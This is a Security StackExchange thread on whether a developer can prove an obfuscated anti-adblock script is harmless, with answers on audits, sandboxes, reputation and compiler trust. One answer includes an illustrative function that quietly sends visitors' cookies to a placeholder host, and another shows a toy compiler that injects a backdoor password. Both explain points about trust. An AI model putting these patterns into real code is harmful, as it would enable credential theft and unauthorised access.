31

I created my own anti-adblock system that does something similar to services like BlockAdblock, except mine goes about adblocker detection in a different manner (and so far cannot be bypassed the way services such as BlockAdblock can).

If you go to my anti-adblocker's page and generate some example anti-adblock code, you'll notice it's all obfuscated (BlockAdblock does this too), which I've done to make it harder for filters and bypass methods to be developed against it. The code cannot be unobfuscated or tampered with/edited (doing so will cause it to not work).

Each generation of this obfuscated anti-adblock code is unique, but every copy performs the same action.

I can see that some potential users of my tool may not trust it, as they can't determine exactly how it works. Am I able to prove to my users that the generated code is not malicious without revealing the actual unobfuscated source? (If I were to reveal the unobfuscated source code, it would defeat the whole purpose of obfuscating in the first place.)

pigeonburger
  • 671
  • 1
  • 4
  • 12
  • 79
    You are asking how to prove a negative. That's extremely difficult at the best of times. – schroeder Aug 15 '21 at 13:57
  • Comments are not for extended discussion; this conversation has been [moved to chat](https://chat.stackexchange.com/rooms/128614/discussion-on-question-by-pigeonburger-how-can-i-prove-to-users-that-my-obfuscat). – schroeder Aug 16 '21 at 09:43
  • 3
    The comments have devolved into a lengthy discussion about the project, and not the question. Please keep all subsequent comments about anti-adblockers to the chatroom linked above. – schroeder Aug 16 '21 at 09:46
  • 14
    Imagine for a second that I am a knife vendor and you are a buyer. I only sell knives to people who won't use them for harming others. Prove to me that you **won't** harm others. This is essentially the uphill battle with your code. – MonkeyZeus Aug 16 '21 at 12:05
  • 1
    Why can you not reveal the unobfuscated source? I thought the point of obfuscating was so that the obfuscated versions are all different from one another, and thus harder to detect? Obfuscation doesn't actually protect the unobfuscated code to any meaningful degree. – Fax Aug 16 '21 at 14:57
  • 1
    he CAN reveal the unobfuscated source... but how does he prove that the unobfuscated code is the same as the obfuscated? btw, I wouldn't get too hung up on proving you are trustworthy. That would only come with time. (or with popularity really... most people just think if it's widely used it must be trustworthy) – pcalkins Aug 16 '21 at 21:27
  • @schroeder can't prove a negative? Then flip the question around: "How can I prove to users that my obfuscated code **only bypasses ad-blockers** without unobfuscating?" (Not that I think you can...) – RonJohn Aug 16 '21 at 23:13
  • 6
    @Fax Because the code relies on the obfuscation to work. If this gets popular, there will be workarounds just as there are for the existing more popular products. This is an arms race that web sites are unlikely to ever win. – Voo Aug 17 '21 at 06:42
  • 1
    @pcalkins Easy enough. Assume the obfuscator can take code and a secret key (known only to website owners, the "users" of this tool) and produce an obfuscation of said code unique to that key. Publish the source of the anti-adblocker and the obfuscator. To verify that a given obfuscated code is not malicious, run the original source through the obfuscator with the key and verify that the result matches the obfuscated code exactly (see the sketch after this comment thread). – Fax Aug 17 '21 at 07:42
  • 4
    Is there a formal definition of malicious? I propose that all buggy code is malicious and all code is buggy ... therefor all code is malicious. It is just a question of whether the cost is worth the benefit. – emory Aug 17 '21 at 12:23
  • 1
    Obfuscation is in the eye of the beholder. – Carl Witthoft Aug 17 '21 at 13:16
  • Same way that people trust compiled applications whose source code they cannot inspect. For javascript, this falls under the general umbrella of [Subresource Integrity](https://www.w3.org/TR/SRI/). – J... Aug 17 '21 at 16:23
  • 2
    Clarification request - OP said: "The code cannot be unobfuscated or tampered with/edited (doing so will cause it to not work)." - would that not imply that any ad-blocker could circumvent your code by trivially modifying it? From whom are you hiding the workings, the site owner (to whom you are presumably selling this tech), or the ad-blocking public your code is countering? – JesseM Aug 17 '21 at 21:49
  • I cannot provide an answer, so I'll just try writing the answer in a small single-line comment (as all answers here seem to miss the fundamental issue). The major topic you are touching on is the halting problem. You are trying to prove that your program/black box will do x and never have outcome y. This is very similar to proving whether a program halts or not. When using a Turing-complete language this is fundamentally not possible. So your only solution would be to use something that is not Turing complete, like an FSM. Then you can show that for any input a valid output is produced. – paul23 Aug 18 '21 at 09:01
  • 1
    Note about one specific statement in your question: "The code cannot be unobfuscated or tampered with" - this is incorrect, any obfuscation can be defeated with sufficient motivation (for example, here's the deobfuscated version of your code: https://pastebin.com/h9VxxZU0). – Rogach Aug 21 '21 at 22:07
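
Picking up the keyed-obfuscation idea from Fax's comment above: if the obfuscator is deterministic for a given source and secret key, a site owner who holds the key can re-run it and compare digests. A minimal Node.js sketch, where `obfuscate` and the key handling are hypothetical:

```javascript
// Hypothetical sketch of the verification step described in the comment:
// re-run the published obfuscator on the published source with your key,
// then compare digests with the code you were actually served.
const crypto = require("node:crypto");

const sha256 = (text) =>
  crypto.createHash("sha256").update(text, "utf8").digest("hex");

function verifyDelivered(obfuscate, publishedSource, secretKey, deliveredCode) {
  // Only works if obfuscate() is fully deterministic for a given key.
  const rebuilt = obfuscate(publishedSource, secretKey);
  return sha256(rebuilt) === sha256(deliveredCode);
}
```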

16 Answers

81

How can I prove to users that my obfuscated code is not malicious without unobfuscating?

Probably, you can't.

Maybe. If trusted persons were willing to audit your code (subject to an NDA, etc.) and sign a static release with their PGP keys, then more people might be willing to install your script, confident that it has been vetted by people who know what they are talking about...

In this world everything is based on trust and reputation. So my advice, if you want to pursue a career in programming, would be to establish that trust and build your reputation from now on. Consider doing some open source code too, and publish it on platforms like GitHub with a liberal license. And I think you already have a few repos on GitHub actually, so don't hesitate to link to your previous work.

If people can see your history and evaluate the quality of your coding practices (though terrifying when you think about it, these are the rules of the game...), they might be more willing to trust your code.

Maybe one day you will work in a software company, or create one, and you will sell closed-source, compiled code like MS-Windows. If your reputation is good enough, if your product is good enough, stable and priced right, your customers will accept it just like they buy other software products they need even though they will never see the source code.

Just curious, but have you tried online JavaScript deobfuscators (like this one, for example)? Is your code still sufficiently obscure after going through those tools?

What you have achieved is still security by obscurity, and JavaScript code can be traced with debuggers too. So, someone who has time on their hands and enough experience can figure out how it works. After all, this is client-side code which is not even compiled.

This can't be the most difficult reverse engineering job assignment on Earth.

I wouldn't worry too much about this at this point, my worry is rather that your invention is time-sensitive, and could even be rendered obsolete by a future version of Firefox or Chrome etc. Defeating adblockers is a never-ending race and everything you make in this area has a limited shelf life.

Stephen King
  • 201
  • 2
  • 12
Kate
  • 6,967
  • 20
  • 23
  • +1 for suggesting a (trusted) third-party audit. Theoretically, this is why we (the public) trust all kinds of systems, not just software. [Underwriters Laboratories](https://en.wikipedia.org/wiki/UL_(safety_organization)) (aka "UL") makes quite a brisk business doing nothing but making sure that products aren't doing anything wrong. – Christopher Schultz Aug 18 '21 at 13:42
52

It is not possible to prove that code isn't malicious if users cannot read it. The best you could hope for is a web of trust where a third party certifies that it's not malicious, but that doesn't remove the trust problem; it just creates an additional one.

From an end-user perspective, the code you're asking about is already malicious in that it attempts to circumvent my security arrangements. I don't need to see the code to know this, and I already avoid websites that tell me to turn my ad blocker off, because they have demonstrated a lack of desire to earn my custom.

Síle
  • 521
  • 2
  • 3
  • Comments are not for extended discussion; this conversation has been [moved to chat](https://chat.stackexchange.com/rooms/128803/discussion-on-answer-by-sile-how-can-i-prove-to-users-that-my-obfuscated-code-is). – Rory Alsop Aug 21 '21 at 17:29
19

Am I able to prove to my users that the generated code is not malicious ...

Probably not. Proving that some specific black box (your code) has a specific behavior and only this behavior is not possible without fully describing the intended behavior first - which basically means providing some form of code.

Just providing some sample input and letting users generate sample output, for example, is not sufficient, since some specific "magic" input could still trigger a backdoor or similar.
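
As a minimal sketch of that point (all names and URLs below are hypothetical, not taken from the tool in question): a function can pass every black-box test a reviewer is likely to run while still hiding a trigger.

```javascript
// Behaves exactly as documented for ordinary inputs, so sample testing
// looks clean, but one "magic" input activates a hidden path.
function isAdBlocked(probeUrl) {
  if (probeUrl === "https://example.invalid/?magic=1337") {
    // Hidden behaviour: leak the visitor's cookies to a third party.
    new Image().src =
      "https://collector.invalid/c?" + encodeURIComponent(document.cookie);
    return Promise.resolve(false);
  }
  // Documented behaviour: resolve true when the probe request is blocked.
  return fetch(probeUrl, { mode: "no-cors" }).then(() => false, () => true);
}
```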

Steffen Ullrich
  • 184,332
  • 29
  • 363
  • 424
8

Put it in a box with limited permissions. Prove that, even if the code inside the box were malicious, it could do no harm.
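
One concrete (if partial) way to build such a box in a browser, sketched here with hypothetical file names and origins: load the untrusted script in a sandboxed iframe without allow-same-origin, so it cannot reach the embedding page's DOM, cookies, or storage, and talk to it only over postMessage.

```javascript
// Minimal sketch: isolate the untrusted (obfuscated) script in a sandboxed
// iframe and expose only a narrow message channel to it.
const box = document.createElement("iframe");
box.setAttribute("sandbox", "allow-scripts"); // scripts run, but no same-origin access
box.style.display = "none";
box.src = "https://static.example.invalid/antiadblock-frame.html"; // hypothetical
document.body.appendChild(box);

window.addEventListener("message", (event) => {
  if (event.source !== box.contentWindow) return; // ignore other frames
  if (event.data && event.data.type === "adblock-result") {
    console.log("ad blocker detected:", event.data.blocked === true);
  }
});
```

The frame can still make outbound network requests of its own, so this narrows what malicious code could do rather than eliminating it; proving the box itself is sound is what the comments below debate.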

Max Murphy
  • 245
  • 1
  • 3
  • 10
    This is a [Homunculus argument](https://en.wikipedia.org/wiki/Homunculus_argument), as now the question is "How do I prove that the box is not malicious?" –  Aug 15 '21 at 20:35
  • 14
    On the contrary, the entire goal of e.g. capability based systems is to isolate what specific pieces of code can do. Auditing entire codebases is not usually practical, cost efficient or even effective. Hence the rise of putting things in boxes with limited permissions; there are many ways of doing this. An ad blocker could fundamentally be a function that is given a URL and returns a bool: true for accept, false for block. The proof then needs to show that the box is strong, i.e. the code cannot break out, and that a bad set of decisions is not an unacceptable risk to the user. – Max Murphy Aug 15 '21 at 20:47
  • 1
    @MaxMurphy the code for your box to hold the blackbox is likely more complex than OP's application code... same goes for proving it does have certain properties. sandboxing is fine, but proving it is safe is fun and from an effort perspective imho only worthwhile if the same sandbox is used for multiple projects. – Frank Hopkins Aug 15 '21 at 23:22
  • 9
    Adobe spent twenty years trying (and failing) to do this with Flash. – Mark Aug 16 '21 at 00:11
  • 5
    @MechMK1 Except there are trusted sandbox systems with visible source code. – user253751 Aug 16 '21 at 08:32
  • 1
    Given that the application only checks if some js library from google adsense loads correctly or not, I can guarantee that the sandbox is going to be orders of magnitude more complex than that. –  Aug 16 '21 at 10:45
  • @FrankHopkins I am not a fan of reinventing the wheel. If there is a sufficiently good existing sandbox (there usually is), I would use that. – Max Murphy Aug 16 '21 at 18:48
  • 1
    @MechMK1 A box with limited permissions doesn't have to rely on obfuscation, so the argument is not recursive. – Dmitry Grigoryev Aug 17 '21 at 12:47
6

Basically, you cannot prove a negative.

This includes, but is not limited to, proving the absence of intended malicious functions or of vulnerabilities that can be used in a malicious way.

Obfuscation is not related to this fundamental problem.

What's worse, your obfuscation tool may (either intentionally or by mistake) introduce vulnerabilities that don't exist in your original code. This way your obfuscated code may be malicious without you knowing that fact.

What can be done, then?

You may ask a third party (trusted by both sides) to audit your (unobfuscated) code.

You may also ask someone to audit your obfuscation tool.

You may be unlucky: no such trusted third party may exist, or you may not be able to afford their services.

You may also fail the audit. It happens.


The best tool you may use to build trust is your reputation.

fraxinus
  • 3,425
  • 5
  • 20
5

Ultimately, this is about trusting not just that the code works as intended, but that the obfuscation step doesn't add extra, undocumented behaviour, which in turn means trusting the people who wrote the code being obfuscated and the people who wrote the obfuscator.

I mentioned Ken Thompson's Reflections on Trusting Trust in a comment above, and I'll attempt to summarize it here for others as I understand it.

The target in Ken Thompson's paper was the C compiler, a tool used to convert C code written for human readability into machine code that the computer itself can run. For our purposes, it's similar to the obfuscation tool you wrote for your JavaScript anti-adblocker.

The attack on the C compiler is described as follows (well, paraphrased):

1.) Write or find compiler source code that, when fed into an existing machine-code compiler, generates a working compiler from the source code you provide.

2.) Modify the compiler source you feed in so that the compiler it produces checks the lines of code it is compiling for specific patterns (e.g. a login class/library), and when it detects one, inserts additional code in that area to provide additional functionality (e.g. "When checking a username/password combination, if this particular password is provided, grant me root access regardless of what the root user's password is, before checking the rest of the code."). Now, no matter who writes the login code for, say, Unix, or what they write, that compiler will produce a version of the Unix executable that contains your modified code. (A toy sketch of this step appears below.)

3.) Add an additional check like step 2.), but for when the compiler detects that it is compiling a compiler: if step 2.)'s code and step 3.)'s code are not already present, add them back in, regardless of what the source code says.

4.) Compile your modified compiler source using the existing machine-code compiler to produce a new machine-code compiler, then remove the step 2.) and step 3.) changes from the source code, and provide the machine-code compiler you have just built to someone else (e.g. someone working on the Unix codebase).

Steps 3.) and 4.) give you a compiler whose source no longer gives the game away that you've inserted backdoors, while the backdoors persist: if someone compiles something, it generally works as expected, but you can't trust that it does exactly what the source says it does, all the time. You would have to use a different machine-code compiler to compile a version without the backdoor, if you were able to notice it at all.
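
A toy sketch of step 2.), in JavaScript rather than C and nothing like Thompson's actual construction (the pattern and the injected password are invented for illustration): a "compiler" that passes most source through untouched but quietly rewrites anything that looks like a login check.

```javascript
// Toy illustration only: a pass-through "compiler" with a hidden rewrite rule.
function evilCompile(source) {
  if (/function\s+checkPassword/.test(source)) {
    // Inject a master password alongside the legitimate check.
    source = source.replace(
      /return\s+([^;]+);/,
      'return password === "letmein" || ($1);'
    );
  }
  // Steps 3.) and 4.) would add a second rule that re-inserts this logic
  // whenever the compiler detects it is compiling a compiler.
  return source;
}

// Example: the compiled output accepts the real password *and* "letmein".
console.log(evilCompile(
  'function checkPassword(password) { return hash(password) === stored; }'
));
```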

What Ken Thompson makes a point of saying is that when code is being generated or run by a thing you did not personally create, you're putting your trust in the person who made the thing compiling your code, or executing your code.

What does this have to do with an obfuscator?

In this case, your obfuscator has essentially the same problem as the compiler: even if you gave users the original source code, once it has passed through your obfuscator to become unique code that evades ad-blocker filters by changing how it looks, how can they trust that the obfuscator doesn't add a few extra details?

The nominal and simple solution to this is trusting the people who made the obfuscator and the people who made the code fed into the obfuscator, but that trust is sometimes hard to gain.

Responding to a comment about proving one's own trustworthiness, since it's relevant to gaining trust:

I understand that this is also more of a reputation thing as well - if you have a trustworthy history as a developer (have I achieved that widely? probably in my city and immediate circle yes, probably not elsewhere)

This is somewhat dependent on the situation in question. In this case, one thing that could be useful is to publish the obfuscator itself as regular, unobfuscated code, and let people test that program on programs they write themselves. (E.g. if they threw document.write() into the obfuscator, could they look at the resulting obfuscated code and verify that, as weird as it may look, it does do what their source intended to do?)
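
For instance, with a deliberately trivial (made-up) level of obfuscation, a reader can still check by hand that the output does the same thing as the input:

```javascript
// What they wrote:
document.write("hello");

// What a toy, hypothetical obfuscator might hand back (hex-encoded string,
// property lookup split in two), still verifiably the same call:
(function (d, s) { d["wr" + "ite"](s); })(document, "\x68\x65\x6c\x6c\x6f");
```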

If the obfuscator has been used by multiple projects, across different teams, that also helps, although you'll always be inching towards trust in the system you've created. As mentioned in the other comments, most people will likely resort to "Has it been used by others? Is it still being used by others? Then I'll trust that the developer has made code that I can trust, on account of trusting these other people who are trusting them, until someone finds that this is actually untrustworthy code." In a sense, trust eventually becomes recursive, in a way that saves time: you trust that code does what it says it does, rather than having to definitively prove that no given step is adjusting things outside of what it's expected to do.

  • 1
    Thanks for converting your comment into an answer. – schroeder Aug 17 '21 at 06:37
  • If one writes a compiler in such a way that the machine-code output is a fully deterministic function of the source, then if one has multiple compilers, knows that at least one of them is trustworthy, and has a machine which can run a piece of machine code receiving a particular file as input and producing a certain file as output, with no ability to do anything else, one could produce a compiler build that could not have any hidden functionality that wasn't in the source, unless every pre-built compiler one has access to contains the same hacks. – supercat Aug 17 '21 at 20:33
  • @supercat: Knowing at least one of them is trustworthy is doing a lot of work - you don't know that your trust is misplaced until you're hit with the backdoor. That said, I suppose that does claim one way they can give trust - by allowing the user to provide their own custom obfuscator instead of the site's default one to generate the obfuscated code from the source. – Alexander The 1st Aug 17 '21 at 23:00
  • 1
    @supercat People have already thought about counter-measures to such only-in-the-binary compiler attacks. See https://reproducible-builds.org and especially https://bootstrappable.org/ – das-g Aug 17 '21 at 23:01
4

A theoretical possibility is that you could implement a 'sandbox' virtual machine that was constructed so as to not have the capability of doing anything 'malicious', and then run your obfuscated code on that virtual machine.

Of course, the definition of 'malicious' depends on who you are asking. For example, an advertiser wants to advertise to people who might become more inclined to buy their product by seeing the advert. They don't want to advertise to people who so loathe and hate adverts and the people who push them that it would count as a huge negative against that company/product. It says "This product is sold by bad people, who don't care about or respect my wishes, don't respect me, and who are totally untrustworthy and hostile to me. People who are willing to make me angry, who will deliberately set out to annoy me, in the hopes of me giving them money." That's not a good marketing tactic. In fact, it has a huge negative value for the brand. (For which reason, advertisers ought to pay more for adverts that allow adblocking - they're more 'targeted' at a receptive audience.) And a website that tries to get more advertising 'views' this way in order to be paid more is ripping off the advertiser. You might as well set up a bot to click on the adverts repeatedly to boost numbers - it would be far less damaging to the advertiser's brand.

There is an argument that people who do not wish to provide a free service should not be tricked into doing so. If users are not willing to look at adverts, then they don't get to use the service, and an adblock detector that picks up the fact that adverts are being blocked and simply denies access (which I suspect is what is being talked about here) is morally arguable. However, it doesn't actually gain you anything, apart from personal satisfaction. The sort of people who use adblockers are people you specifically do not want to advertise to anyway. Someone furious because they feel they have just been forced to view your adverts against their will is not exactly in a receptive frame of mind to judge your offering fairly. So all that really happens is fewer people use the site, and thus you have fewer word-of-mouth recommendations to direct other readers there who do allow adverts. Maybe you're OK with that, and maybe that makes financial sense, if the marginal cost of serving those extra users exceeds the value of the goodwill. But for many purposes, a lot of users do see it as malice, and judge the propagators accordingly.

As such, no, you can't prove that it's not 'malicious' as the users define it.

You would probably have been better off not mentioning what you were going to use the code for. The question of how to prove that obfuscated code satisfies security constraints is an interesting one. It seems like an area where zero-knowledge proofs might have some application.

4

Software companies do not generally "prove" to their customers that their software is not malicious. (In this case, your customers are the web sites which will embed your code, not the end-users whose browsers it will execute in.) It is generally assumed that if you are in the business of selling software to paying customers, you would not deliberately include code which harms your customers, since doing so would be sabotaging your own business.

If potential customers feel that your company is sketchy or untrustworthy, they will not ask you to "prove" that your software is safe. They just won't buy from you.

Rather than trying to "prove" that your product is not malicious, make it possible for customers to hold you accountable, by having a registered company with a physical address and assets which you could be sued for if you do something really bad to them. That counts for a lot more than a purported "proof".

Alex D
  • 181
  • 3
  • 2
    I'd like nothing more than to be able to have users trust me by leaving proper contact details and being part of a proper company, but as I'm not yet 18, establishing my own business/company is a difficult task, and I'd prefer to protect my identity until then. In the future though, I definitely want to do this. – pigeonburger Aug 16 '21 at 10:06
  • 1
    @pigeonburger Then you'll have to look for customers who are trusting. Fortunately, most people are. – Alex D Aug 16 '21 at 10:07
2

Depending on your customer and their capabilities, you might be able to rely on a Zero Knowledge Proof. These are typically (always?) interactive proofs, where any given customer can develop a given statistical level of confidence.

The classic example would be a scenario where you know a path through a cave that has two entrances, and you wish to prove that you know this to someone else. Of course, if you just let them follow you through the cave, then they'd know the secret.

The solution to this classic example is for them to close their eyes, and you go into the tunnel. They then shout out "left" or "right," and you appear from the named entrance. If you know a path, you can do it 100% of the time. If you don't, you can only do so 50% of the time. But no information was released, so you can just repeat the experiment until the other party is sufficiently convinced.
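
The arithmetic behind "repeat until sufficiently convinced" is simple enough to sketch: a prover who doesn't know the path survives each round only by guessing, so after n clean rounds the verifier's confidence is 1 - 0.5^n.

```javascript
// Confidence that the prover isn't just guessing after n successful rounds,
// assuming a cheating prover passes any single round with probability 0.5.
const confidenceAfter = (rounds) => 1 - Math.pow(0.5, rounds);

console.log(confidenceAfter(10)); // 0.9990234375
console.log(confidenceAfter(20)); // ~0.999999046
```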

There are several approaches which pull this sort of thing off by breaking up an operation into two steps, and then revealing the step requested by the verifier.

Of course, you'll still have to solve the issue of "how can I trust any arbitrary code", and you'll have to deal with Rice's theorem. This is where approaches like the one supercat mentions in their answer come in. There are constructs, such as virtual machines and containers, for which a syntactic proof can show that no bad operation can occur. You just have to choose a technology which puts your particular verifier's definition of "a bad operation" into a bucket that can be captured syntactically.

One that I personally enjoyed was NaCl by Google. Native Client (NaCl) was a clever little sandbox based on process boundaries. It did some clever tricks with controlling jumps to ensure the client code could never access the "kernel" code in an unintended way.

In such a system, the sandboxing technology you use would become part of what could be quickly detected, and thus needs to be obfuscated. You could give them a sandbox, and they could do one of two things with it:

  • Request that you de-obfuscate the sandbox to prove it behaves as promised
  • Request a copy of your software that can be run within the obfuscated sandbox.

With a lot of care (ZKPs are hard), you can set it up so that the only way they could un-obfuscate your code is to request both that the sandbox be de-obfuscated and that the code to install in the sandbox be delivered.

Cort Ammon
  • 9,206
  • 3
  • 25
  • 26
  • As an additional ingredient in the proof, one could supply hashes of both the de-obfuscated sandbox and the code that would be run within it, in advance of being told which piece of information they wanted. – supercat Aug 17 '21 at 20:37
2

You'll need to define "malicious" first. Perhaps you could claim that only omitting (not modifying) http(s) display streams, and performing no I/O (including not storing any state information), makes it non-malicious.

Proving claims about code is an extremely expensive and complex undertaking. A good first step would be to expose (unobfuscated) all browser call-backs and library entry points. If the remainder is purely algorithmic (no I/O) and the interface is clear, you are close.
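
A sketch of what that separation could look like (structure and names are hypothetical, not the OP's code): every browser call-back and network touchpoint lives in a small readable shell, and whatever remains obfuscated is confined to pure, I/O-free functions.

```javascript
// Readable, unobfuscated I/O surface: the only place the network is touched.
async function probeAdNetwork(url) {
  try {
    await fetch(url, { mode: "no-cors" });
    return true;                 // request went through
  } catch {
    return false;                // request was blocked
  }
}

// The obfuscated part is confined to pure functions like this: input in,
// value out, no I/O and no stored state, so its claims are easier to audit.
function classify(probeSucceeded) {
  return probeSucceeded ? "ads-visible" : "ads-blocked";
}
```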

stevea
  • 56
  • 1
1

Put some serious money in an escrow account controlled by a trusted third party with a worldwide reputation for trustworthiness. Then, if someone can prove that your code is malicious, they get that money.

  • 3
    The nature of the obfuscated code makes your suggestion impossible since each generated code is unique. Your suggestion only works if the code is static and not dynamically generated. – schroeder Aug 16 '21 at 09:53
  • @schroeder I don't follow. What difference does that make exactly? The scheme explained above would work perfectly well even if each obfuscated bit of source is unique. – David Schwartz Aug 16 '21 at 17:47
  • @DavidSchwartz The context of the question is not the code generator, but the generated code. The dynamically generated code would have to be shown to be non-malicious. – schroeder Aug 16 '21 at 18:02
  • 1
    @schroeder This isn't about proving the code non-malicious. This is about giving people an incentive to prove the code malicious such that we can have some reasonable level of confidence that we aren't getting malicious code because nobody has claimed the incentive. I don't see how there being lots of different bits of code out there changes this in any way. A company could have any number of products (including one for each customer) and still use this same method to assure all of its customers that it's unlikely it ever gave out any malicious code to anyone. – David Schwartz Aug 16 '21 at 20:23
0

It may be possible to arrange to have the program contain a virtual machine that is written in an easily-understandable fashion, and which can be readily proven not to be capable of causing any intolerable side effects. Alternatively, it may be possible to write the program in such a way that it can be run from within an existing virtual machine that would meet such requirements (e.g. a web browser).

This would not preclude the possibility that a program which has access to certain confidential data and can deliver outputs to certain untrustworthy entities might steganographically conceal the confidential data within the outputs given to those entities, but smuggling data in such fashion would be impossible if all entities that are entitled to receive output from the program were also entitled to receive any of the inputs fed to it.

supercat
  • 2,029
  • 10
  • 10
0

You can have an external, reputable company audit your code, build it, and distribute the dynamic binaries from their own infrastructure.

This way, people getting the obfuscated code could trust someone other than you.

The key point here is that you hand over the distribution of audited code (well, the output of audited code) to someone that will provide more trust than yourself.

WoJ
  • 8,957
  • 2
  • 32
  • 51
  • I'm not sure this approach is practical (or that someone would host it) but it's a clever idea. "Transfer the risk" – schroeder Aug 18 '21 at 16:27
  • @schroeder: this approach is used by some enterprises for very sensitive code (usually with the addition of an escrow). – WoJ Aug 18 '21 at 16:46
-1

One thing that was not discussed in the other answers (but that is probably only of theoretical interest) is the ability to provide, along with the obfuscated program, a formal proof of invariants. But this assumes your customer(s) would be able to formulate "non-maliciousness" as a set of such invariants.

matovitch
  • 99
  • 1
  • While the idea appears nice, it does not even work in theory: the list of invariants is finite. How does one prove that no invariant was forgotten? You also have to prove the correctness of the JavaScript interpreter (good luck with that) and of the hardware executing it. That's not even counting the cost to make such proofs: it would be prohibitively expensive. – A. Hersean Aug 18 '21 at 12:40
  • @A.Hersean Every method is imperfect and all your points are valid. But if the invariants are carefully chosen, and you trust the interpreter, the machine running the code, and the proof assistant checking the invariants (which should be reasonable assumptions), it should increase your confidence in the "non-maliciousness" of the code, which is all you can reasonably ask for. – matovitch Aug 19 '21 at 05:34
-1

The code cannot be unobfuscated or tampered with/edited (doing so will cause it to not work).

Um, the CPU that executes said code would like to have a word about the fundamentals.

I have no idea what you'd mean by "the code cannot be unobfuscated": either the thing runs on some platform (presumably the user's browser), or not. If it runs, and if you're not using some DRM black-box channel to send the real code for execution to a trusted enclave deep within the user's machine, then unobfuscating it is just a matter of time. There's no unobfuscatable obfuscation; code that genuinely couldn't be read back simply wouldn't work.

Now, yeah, you may be leveraging some platform introspection to ensure that the most blatant attempts at runtime modification will be detected. But that goes out of the window as soon as you're dealing with someone who doesn't run an unmodified platform. It's not very hard to let the JS introspection and DOM see the unmodified code while the VM actually runs something else :)

-1

The only reasonable way to achieve your goal is by building reputation. Otherwise, even if today's version is safe, it is always possible that the malware is coming in the next version.

One approach is to use something like the Wayback Machine to prove that your site has been online (and your product has been offered) for quite a long time. It is hard to keep a malware site online for five years as if nothing were wrong. Also, register an official company and provide your real identity.

h22
  • 901
  • 6
  • 10